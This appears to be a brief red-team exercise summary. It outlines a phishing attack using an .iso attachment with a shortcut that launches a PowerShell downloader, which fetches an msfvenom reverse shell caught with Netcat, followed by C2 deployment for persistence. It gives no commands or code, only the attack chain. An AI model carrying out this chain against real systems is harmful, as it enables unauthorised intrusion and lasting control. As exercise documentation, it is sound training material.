summary

In this project, a phishing campaign was created using a crafted email with a malicious .iso file attachment. The .iso contained a shortcut that executed a PowerShell-based downloader. The downloader fetched a reverse shell payload generated using msfvenom. A Python web server was used to host the payload, and Netcat was set up to catch the incoming shell. After gaining access, a Command and Control (C2) infrastructure was deployed to maintain persistence on the target system.

Part 1: Pre-Attack Phase (Red Team)

• Created a phishing email with a malicious payload.
• Generated a reverse shell using msfvenom.
• Used PowerShell to craft a .txt shortcut file.
• Hosted payload using a Python web server.
• Prepared Netcat to receive the reverse shell connection.

Part 2: Phishing Attack

• Sent a phishing email containing a weaponized .iso file.
• .iso executed a downloader that fetched and ran the reverse shell.
• Successfully gained shell access to the target system.

Part 3: Command and Control (Red Team)

• Used the reverse shell to deploy a Command and Control (C2) framework.
• Maintained persistent access to the compromised system.
• Enabled communication with the target for further control and exploitation.
• Prepared the environment for multi-host compromise via the C2 infrastructure.